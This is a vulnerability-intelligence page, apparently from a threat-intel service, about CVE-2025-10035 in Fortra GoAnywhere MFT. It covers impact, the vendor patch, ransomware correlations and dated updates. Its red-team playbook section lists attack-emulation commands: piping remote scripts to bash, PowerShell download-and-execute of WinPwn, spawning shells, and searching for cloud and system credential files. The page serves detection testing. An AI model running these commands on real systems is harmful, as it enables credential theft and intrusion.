CVE-2025-10035
Overview
This vulnerability is an insecure deserialization flaw within the License Servlet component of Fortra GoAnywhere MFT. The root cause is the deserialization of attacker-controlled objects facilitated by a validly forged license response signature. This allows manipulation of the deserialization process to inject arbitrary objects without proper validation or sanitization.
Vulnerability Description
A deserialization vulnerability in the License Servlet of Fortra's GoAnywhere MFT allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.
Impact
An attacker with the ability to forge a valid license response signature can execute arbitrary commands remotely on the affected system without requiring authentication or user interaction. This leads to potential full system compromise, including unauthorized data access, lateral movement within the network, and disruption of managed file transfer services. The prerequisite is possession or derivation of the private key necessary to sign the malicious payload correctly, which raises the difficulty of exploitation but does not eliminate the risk for capable adversaries.
Solution
Fortra has released a security advisory (FI-2025-012) detailing remediation steps for this vulnerability affecting GoAnywhere MFT. Users should apply the patch published on September 15, 2025, as documented in the vendor’s release notes. Detailed patch instructions and updates are available at https://www.fortra.com/security/advisories/product-security/fi-2025-012. No alternative workarounds have been specified by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Storm-1175
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The deserialization vulnerability present in the License Servlet of Fortra's GoAnywhere Managed File Transfer product represents a significant security risk. This type of vulnerability occurs when an application deserializes untrusted data without sufficient validation, allowing an attacker to manipulate the data structure. In this case, an adversary can forge a license response signature, enabling them to inject arbitrary objects into the application. This manipulation can lead to command injection, where the attacker could execute unauthorized commands on the server, potentially compromising the entire system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with a validly forged license response signature can send crafted requests to the License Servlet, triggering the deserialization process. Once the attacker successfully injects their object, they can execute arbitrary code or commands on the server. This exploitation could be orchestrated remotely, making it accessible to a wide range of potential attackers. The ability to execute commands could lead to unauthorized access to sensitive data, disruption of services, or even complete system takeover, depending on the privileges of the application and the underlying system.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Fortra's GoAnywhere for secure file transfers. The high CVSS score of 9.8 indicates a critical severity level, suggesting that successful exploitation could lead to severe consequences. Businesses could face data breaches, loss of sensitive information, and significant reputational damage. Additionally, regulatory fines and legal repercussions might arise from non-compliance with data protection laws, especially if customer data is compromised. The financial implications of remediation efforts, including incident response, system recovery, and potential loss of business, further exacerbate the risk.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the GoAnywhere product is crucial, as vendors often release updates to address known vulnerabilities. Conducting thorough security assessments and penetration testing can help identify weaknesses in the application and its configurations. Additionally, organizations should employ application firewalls and intrusion detection systems to monitor for unusual patterns of behavior that may indicate exploitation attempts. Implementing strict input validation and sanitization measures can also help prevent unauthorized data manipulation during the deserialization process.
In conclusion, the deserialization vulnerability in Fortra's GoAnywhere Managed File Transfer product poses a significant threat to organizations utilizing this software. The potential for command injection and the associated risks highlight the importance of robust security practices. By prioritizing timely updates, proactive security assessments, and stringent input validation, organizations can mitigate the risks associated with this vulnerability and protect their sensitive data and systems from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in activity exploiting the deserialization vulnerability in Fortra’s GoAnywhere MFT License Servlet. Our telemetry indicates a significant uptick in exploitation attempts, reflecting growing adversary interest despite a slight decline in the EPSS score. This divergence suggests that while automated risk scoring adjusts downward, real-world targeting by threat actors—including ransomware groups such as Storm-1175 and variants of LockBit—remains persistent and intensifying. The emergence of multiple new proof-of-concept exploits publicly available on GitHub further lowers the barrier for attackers to weaponize this vulnerability, increasing the likelihood of successful intrusions. Given the known association with ransomware campaigns and the critical severity of the flaw, defenders should regard the threat level as elevated. The increased exploitation activity underscores the urgency for heightened monitoring and response capabilities within environments running the affected software.
Update 2 — May 20, 2026
CSURFACE threat intelligence has recorded a marked reduction in detection activity related to CVE-2025-10035, despite the vulnerability’s CVSS score being elevated to a perfect 10.0. This adjustment reflects a refined understanding of the exploit’s potential impact, underscoring its criticality in enabling remote command injection through deserialization. Concurrently, the Exploit Prediction Scoring System (EPSS) score has increased modestly, indicating a slightly heightened likelihood of exploitation attempts in the near term. The inclusion of this vulnerability in the Known Exploited Vulnerabilities (KEV) catalog, coupled with its confirmed use by ransomware groups such as Storm-1175 and LockBit variants, affirms its strategic value to threat actors. The presence of multiple new proof-of-concept exploits on public repositories continues to lower the barrier for adversaries to weaponize this flaw, even as observed exploitation attempts have temporarily declined. This dynamic suggests a potential shift in attacker tactics or a pause preceding renewed activity. Overall, the threat level remains critically high, with the updated scoring and KEV listing reinforcing the urgency for vigilant monitoring and proactive defense within environments running Fortra GoAnywhere MFT.
Update 3 — June 09, 2026
The recent adjustment of CVE-2025-10035’s CVSS score from 10.0 to 9.8, alongside an increase in its EPSS score, reflects a refined understanding of its exploitability and impact. CSURFACE threat intelligence notes that while the vulnerability remains critically severe, the slight downward revision in CVSS suggests nuanced reassessment of exploit conditions or impact metrics. Concurrently, the upward trend in EPSS indicates a growing likelihood of exploitation attempts in the near term, corroborated by the vulnerability’s inclusion in the KEV catalog with a defined due date and confirmed use in ransomware campaigns by groups such as Storm-1175 and LockBit variants. Our telemetry continues to detect the proliferation of new proof-of-concept exploits on public platforms, which lowers the technical barrier for adversaries and sustains the risk of opportunistic exploitation. Although direct exploitation attempts have not surged markedly, the combination of increased EPSS and active ransomware targeting underscores an elevated threat posture. Defenders should interpret these developments as a signal that adversaries remain actively interested and capable of leveraging this flaw, maintaining the vulnerability’s critical status within operational risk frameworks.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortra | Goanywhere Managed File Transfer | All |
cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
|
|
|
Fortra | Goanywhere Managed File Transfer | All |
cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
rxerium/CVE-2025-10035
Detection for CVE-2025-10035
|
rxerium | 18 | 3 | 2025-09-20 | View |
|
ThemeHackers/CVE-2025-10035
A deserialization vulnerability in the License Servlet of Fortra's GoAnywhere MFT allows an actor with a validly forged ...
|
ThemeHackers | 1 | 0 | 2025-09-21 | View |
|
orange0Mint/CVE-2025-10035_GoAnywhere
CVE-2025-10035_GoAnywhere Get RCE
|
orange0Mint | 0 | 0 | 2025-09-27 | View |
Ransomware Groups 1
Threat Feed
17 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-10035 |
| fortra.com |
GitHub CVE
|
https://www.fortra.com/security/advisories/product-security/fi-2025-012 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-10035 |